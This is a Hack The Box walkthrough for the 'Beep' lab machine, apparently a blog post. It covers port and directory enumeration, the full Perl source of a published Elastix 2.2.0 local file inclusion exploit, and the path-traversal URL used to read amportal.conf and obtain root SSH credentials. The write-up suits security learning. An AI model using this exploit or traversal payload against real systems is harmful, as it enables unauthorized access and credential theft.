DEV Community

ikkyu
ikkyu

Posted on

【Hack the Box】Beep - Walkthrough

Twitter: ikk_hck

From the HackTheBox
Screenshot_2021-03-22_12-00-08

Enumeration

$ nmap -oA nmap -sV 10.10.10.7                                                                                       130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 02:33 PDT
Nmap scan report for 10.10.10.7
Host is up (0.27s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap?
443/tcp   open  ssl/https?
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.95 seconds
Enter fullscreen mode Exit fullscreen mode

Access port 80.

Screenshot_2021-03-22_12-24-53

Explore the directory.

$ gobuster dir -u https://10.10.10.7 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -k
Enter fullscreen mode Exit fullscreen mode

"-k" is an option to not validate the SSL certificate.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/22 12:10:13 Starting gobuster
===============================================================
/admin (Status: 301)
/images (Status: 301)
/modules (Status: 301)
/themes (Status: 301)
/help (Status: 301)
/var (Status: 301)
/mail (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/libs (Status: 301)
/panel (Status: 301)
/configs (Status: 301)
/recordings (Status: 301)
/vtigercrm (Status: 301)
===============================================================
2021/03/22 12:50:18 Finished
===============================================================

Enter fullscreen mode Exit fullscreen mode

Let's see "/help".

Screenshot_2021-03-22_12-29-10

It shows that the last backup was in 2010.

Screenshot_2021-03-22_12-29-36

Find out which version of elastix was released in 2010(http://freshmeat.sourceforge.net/projects/elastix/releases).

Screenshot_2021-03-22_12-38-33

We can see that Elastix version is 2.0.

Search for elastix in Exploitdb.

$ searchsploit elastix    
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                      | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                    | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                              | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                           | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                          | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                         | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                     | php/webapps/18650.py
------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Enter fullscreen mode Exit fullscreen mode

The third one is CSS and requires an active user. Therefore, we will use the fourth one.

$ searchsploit -m 37637
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators

Copied to: /home/ikkyu/Desktop/beep/37637.pl
Enter fullscreen mode Exit fullscreen mode

Copy 37637.pl and look at the code.

$ cat 37637.pl 
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {

print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";

}
else { 
print "\n[-] not successful\n";
        }                                                  
Enter fullscreen mode Exit fullscreen mode

Type "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action" into your browser based on the information in the middle of the code.

The result of "dirbuster" already confirms the existence of "/vtigercrm".

Screenshot_2021-03-22_23-20-06

It's hard to read, so let's look at the source. You will see the user name and password.

Screenshot_2021-03-22_23-26-28

Make an ssh connection to the target machine with the username "root" and the password "jEhdIekWmdjE".

$ ssh root@10.10.10.7
Enter fullscreen mode Exit fullscreen mode

After connecting to ssh, read root.txt to get the flag.

Discussion (0)